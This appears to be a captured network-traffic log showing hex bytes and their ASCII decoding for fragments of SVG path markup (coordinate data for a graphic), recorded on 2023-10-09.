                                                                                                                                                                                                                                                        Data Ascii: 1,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M831.84,343a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"/><p
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC140INData Raw: 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 35 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 38 2e 37 35 2c 32 31 37 2e 35 32 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c
                                                                                                                                                                                                                                                        Data Ascii: 73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.95,2.41,2.41,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M848.75,217.52a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC156INData Raw: 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 35 2c 32 39 32 2e 38 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 37 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 32 37 2c 32 38 35 2e 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e
                                                                                                                                                                                                                                                        Data Ascii: cls-4" d="M879.5,292.83a1.72,1.72,0,0,1-.77,2.24,2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M879.27,285.9a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC172INData Raw: 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 31 30 2c 33 36 31 2e 32 31 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 30 39 2e 37 39 2c 33 35 34 2e 32 38 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33
                                                                                                                                                                                                                                                        Data Ascii: 2.86"/><path class="cls-4" d="M910,361.21a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M909.79,354.28a1.71,1.71,0,0,1-.78,2.23,2.5,2.5,0,0,1-3.33-.94,2.3
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC188INData Raw: 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 36 2e 39 34 2c 32 33 35 2e 37 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 36 2e 37 2c 32 32 38 2e 37 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32
                                                                                                                                                                                                                                                        Data Ascii: 9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M926.94,235.7a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"/><path class="cls-4" d="M926.7,228.76a1.72,1.72,0,0,1-.78,2.24,2
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC204INData Raw: 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 32 37 2e 31 31 2c 31 37 30 2e 35 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 32 37 2e 33 34 2c 31 37 37 2e 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 39 2c 32
                                                                                                                                                                                                                                                        Data Ascii: 82"/><path class="cls-4" d="M1027.11,170.57a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M1027.34,177.4a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.39,2
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC220INData Raw: 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 31 30 2e 36 39 2c 33 30 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 39 37 2e 35 31 2c 31 31 36 2e 38 38 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33
                                                                                                                                                                                                                                                        Data Ascii: -.16-2.81"/><path class="cls-4" d="M1010.69,301a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"/><path class="cls-4" d="M997.51,116.88a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.3
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC236INData Raw: 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 38 31 2e 30 39 2c 32 34 37 2e 33 32 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 38 31
                                                                                                                                                                                                                                                        Data Ascii: .37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M981.09,247.32a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M981
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC253INData Raw: 2c 31 38 36 2e 38 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 35 31 2e 34 39 2c 31 39 33 2e 36 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e
                                                                                                                                                                                                                                                        Data Ascii: ,186.81a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M951.49,193.64a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.39,2.39,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC269INData Raw: 30 2c 31 2d 32 2e 38 36 2c 30 41 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 39 32 32 2c 31 32 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 31 2e 36 37 2c 31 33 33 2e 31 32 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 31 2e 39 2c 31 34 30 61 31 2e 36 38 2c 31 2e 36 38 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e
                                                                                                                                                                                                                                                        Data Ascii: 0,1-2.86,0A2.09,2.09,0,0,1,922,125"/><path class="cls-4" d="M921.67,133.12a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.1,2.1,0,0,1-.15-2.82"/><path class="cls-4" d="M921.9,140a1.68,1.68,0,0,1,.76-2.2,2.
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC285INData Raw: 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 30 35 2e 34 37 2c 32 37 30 2e 33 39 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 41 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2c 39 30 39 2c 32 37 32 61 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c
                                                                                                                                                                                                                                                        Data Ascii: 48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M905.47,270.39a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.29.93A2.38,2.38,0,0,1,909,272a2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC301INData Raw: 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 35 2e 36 35 2c 32 30 39 2e 38 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 35 2e 38 38 2c 32 31 36 2e 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d
                                                                                                                                                                                                                                                        Data Ascii: class="cls-4" d="M875.65,209.87a1.69,1.69,0,0,1,.76-2.2,2.49,2.49,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M875.88,216.7a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC317INData Raw: 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 36 2e 30 35 2c 31 35 36 2e 31 39 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22
                                                                                                                                                                                                                                                        Data Ascii: 36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"/><path class="cls-4" d="M846.05,156.19a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"/><path class="cls-4" d="
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC333INData Raw: 2c 32 38 36 2e 36 33 61 31 2e 36 38 2c 31 2e 36 38 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 32 39 2e 38 36 2c 32 39 33 2e 34 35 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32
                                                                                                                                                                                                                                                        Data Ascii: ,286.63a1.68,1.68,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.92,2.37,2.37,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M829.86,293.45a1.7,1.7,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC349INData Raw: 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 30 2c 32 33 32 2e 39 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 30 2e 32 36 2c 32 33 39 2e 37 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39
                                                                                                                                                                                                                                                        Data Ascii: ,0,0,1-.16-2.81"/><path class="cls-4" d="M800,232.94a1.7,1.7,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"/><path class="cls-4" d="M800.26,239.77a1.7,1.7,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.9
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC365INData Raw: 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 30 35 2c 32 32 39 2e 32 35 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 30 34 2e 37 33 2c 32 32 31 2e 35 33 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39
                                                                                                                                                                                                                                                        Data Ascii: 37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M505,229.25a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M504.73,221.53a1.92,1.92,0,0,1-.87,2.49,2.79,2.79
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC381INData Raw: 3d 22 4d 35 32 33 2e 38 31 2c 38 39 2e 35 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 33 2e 35 35 2c 38 31 2e 38 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e
                                                                                                                                                                                                                                                        Data Ascii: ="M523.81,89.56a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M523.55,81.84a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC397INData Raw: 2e 36 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 35 37 2e 35 32 2c 31 35 37 2e 39 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33
